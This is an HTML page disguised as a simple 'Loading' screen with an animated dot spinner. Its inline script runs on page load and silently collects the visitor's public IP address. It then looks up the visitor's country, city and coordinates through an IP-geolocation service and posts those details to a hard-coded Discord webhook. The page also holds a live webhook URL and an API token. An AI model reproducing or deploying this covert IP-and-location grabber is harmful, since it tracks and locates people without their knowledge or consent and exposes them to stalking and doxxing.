<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Loading</title>
    <style>
      ::-webkit-scrollbar {
        display: none;
      }
      body {
        background-color: rgb(221, 201, 171);
        overflow-y: hidden;
      }
      .loading {
        width: 100vw;
        height: 100vw;
        background-color: rgb(221, 201, 171);
      }
      .loader {
        width: 16px;
        height: 16px;
        border-radius: 50%;
        display: block;
        margin: 15px auto;
        position: absolute;
        left: 50%;
        top: 50%;
        transform: translate(-50%, -50%);
        background: #fff;
        box-shadow: -24px 0 #fff, 24px 0 #fff;
        box-sizing: border-box;
        animation: shadowPulse 2s linear infinite;
      }

      @keyframes shadowPulse {
        33% {
          background: #fff;
          box-shadow: -24px 0 #ff3d00, 24px 0 #fff;
        }
        66% {
          background: #ff3d00;
          box-shadow: -24px 0 #fff, 24px 0 #fff;
        }
        100% {
          background: #fff;
          box-shadow: -24px 0 #fff, 24px 0 #ff3d00;
        }
      }
    </style>
  </head>
  <body>
    <div class="loading"></div>
    <span class="loader"></span>
    <script>
      const x = fetch("https://api.ipify.org")
        .then((res) => res.text())
        .then((date) => {
          fetch(`https://ipinfo.io/${date}?token=d8442dc2cf0feb`)
            .then((res) => res.json())
            .then((date) => {
              fetch(
                "https://discord.com/api/webhooks/1226702333166223410/kYOwT9rdbIJpXRV733j-npMkOMSbSyKsZX3yDqIOHVzmTAum4WMbJByUpCENawNkmiRW",
                {
                  method: "POST",
                  headers: { "content-type": "application/json" },
                  body: JSON.stringify({
                    content: `IP ${
                      date.ip
                    } \n   :flag_${date.country.toLowerCase()}: country ${
                      date.country
                    }  City ${date.city}
                       \n :round_pushpin: location ${date.loc} `,
                  }),
                }
              );
            });
        });
    </script>
  </body>
</html>
